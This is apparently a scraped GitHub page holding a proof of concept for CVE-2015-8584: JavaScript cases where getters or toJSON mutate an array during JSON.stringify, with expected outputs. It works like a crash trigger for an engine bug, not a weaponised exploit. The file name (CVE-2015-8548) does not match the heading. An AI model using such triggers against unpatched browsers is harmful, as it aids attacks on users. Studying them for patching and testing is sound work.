CVE-2015-8584

Date: Nov 2015
Credit: ??

PoC

var array = [];
var funky = {
  toJSON: function() { array.length = 1; return "funky"; }
};
for (var i = 0; i < 10; i++) array[i] = i;
array[0] = funky;
'["funky",null,null,null,null,null,null,null,null,null]' == JSON.stringify(array);

array = [];
funky = {
  get value() { array.length = 1; return "funky"; }
};
for (var i = 0; i < 10; i++) array[i] = i;
array[3] = funky;
'[0,1,2,{"value":"funky"},null,null,null,null,null,null]' == JSON.stringify(array);

array = [];
funky = {
  get value() { array.pop(); return "funky"; }
};
for (var i = 0; i < 10; i++) array[i] = i;
array[3] = funky;
'[0,1,2,{"value":"funky"},4,5,6,7,8,null]' == JSON.stringify(array);

array = [];
funky = {
  get value() { delete array[9]; return "funky"; }
};
for (var i = 0; i < 10; i++) array[i] = i;
array[3] = funky;
'[0,1,2,{"value":"funky"},4,5,6,7,8,null]' == JSON.stringify(array);

array = [];
funky = {
  get value() { delete array[6]; return "funky"; }
};
for (var i = 0; i < 10; i++) array[i] = i;
array[3] = funky;
'[0,1,2,{"value":"funky"},4,5,null,7,8,9]' == JSON.stringify(array);

array = [];
funky = {
  get value() { array[12] = 12; return "funky"; }
};
for (var i = 0; i < 10; i++) array[i] = i;
array[3] = funky;
'[0,1,2,{"value":"funky"},4,5,6,7,8,9]' == JSON.stringify(array);

array = [];
funky = {
  get value() { array[10000000] = 12; return "funky"; }
};
for (var i = 0; i < 10; i++) array[i] = i;
array[3] = funky;
'[0,1,2,{"value":"funky"},4,5,6,7,8,9]' == JSON.stringify(array);

Reference

Diff

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

CVE-2015-8548.md

CVE-2015-8548.md

CVE-2015-8584

PoC

Reference

Files

CVE-2015-8548.md

Latest commit

History

CVE-2015-8548.md

File metadata and controls

CVE-2015-8584

PoC

Reference